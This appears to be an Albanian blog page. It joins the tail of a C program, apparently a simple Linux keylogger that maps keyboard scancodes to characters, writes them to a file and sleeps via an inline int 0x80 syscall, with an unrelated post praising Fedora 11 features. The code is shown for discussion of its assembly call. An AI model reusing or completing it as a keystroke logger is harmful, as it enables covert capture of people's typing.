case(25) : prm ='p' ;break;case(26) : prm ='ü';break;
case(27) : prm ='+' ;break;case(28) : prm ='\n';break;
case(30) : prm ='a' ;break;case(31) : prm ='s';break;
case(32) : prm ='d' ;break;case(33) : prm ='f';break;
case(34) : prm ='g' ;break;case(35) : prm ='h';break;
case(36) : prm ='j' ;break;case(37) : prm ='k';break;
case(38) : prm ='l' ;break;case(39) : prm ='ö';break;
case(40) : prm =39 ;break;case(41) : prm =96 ;break;
case(43) : prm =92 ;break;case(44) : prm ='y';break;
case(45) : prm ='x' ;break;case(46) : prm ='c';break;
case(47) : prm ='v' ;break;case(48) : prm ='b';break;
case(49) : prm ='n' ;break;case(50) : prm ='m';break;
case(51) : prm =180 ;break;case(52) : prm =46 ;break;
case(53) : prm ='-' ;break;case(57) : prm =32 ;break;
default : prm =0 ;break;}
if(prm != dm)
write(fd,&prm,1);
asm("int $0x80"::"a"(162),"b"(ts),"c"(0));}
close(fd);}

Pjesen me te madhe te ketij kodi e kuptoj pervec kodit asm() pra pjeses ne assembler edhe se di pak nga ajo gjuhe ketu as qe po e marr vesh.Pra pak a shum therritet nje int nje funksion ose call, por cfar funksioni ka? Hajt pra ta diskutojme..

t0n19ht w3 c0d3 1n h377 | Fedora 11

Edhe pak dite na ndajn nga versioni zyrtar i Fedora 11 /emri ne kod Leonida.

Ky version i ri eshte deshmuar qe ne beta qe ka ardhur me inovacione dhe sherbime shume te mira.
Vjen me fielsystemin e ri Ext4 i cili ka performanca shume me te larta se Ext3 dhe nje menaxhim hapesire me te mire, Serverin e ri X (1.6)  me nje suport me te mire grafik, nje boot ne kohe rekord prej 20 sekondash dhe DNSSEC extention i preinstaluar duke shmangur ne kete menyre nje rrezik trendy sot persa i perket sulmeve te DNS-ve.

RPM 4.6 qe vjen me nje miksim te paketave te instalimit midis atyre te vjetrave dhe atyre te openSUSE me YaST duke i shtuar kesaj Presto i cili lejon te perdoren dhe DeltaRPM , suport i ri per skedat ATI Radeon dhe ne pergjithesi me 28 inovacione te konfirmuara nga webi zyrtar.

http://fedoraproject.org/wiki/Releases/11/FeatureList

Me siguri eshte nje “Must Have” OS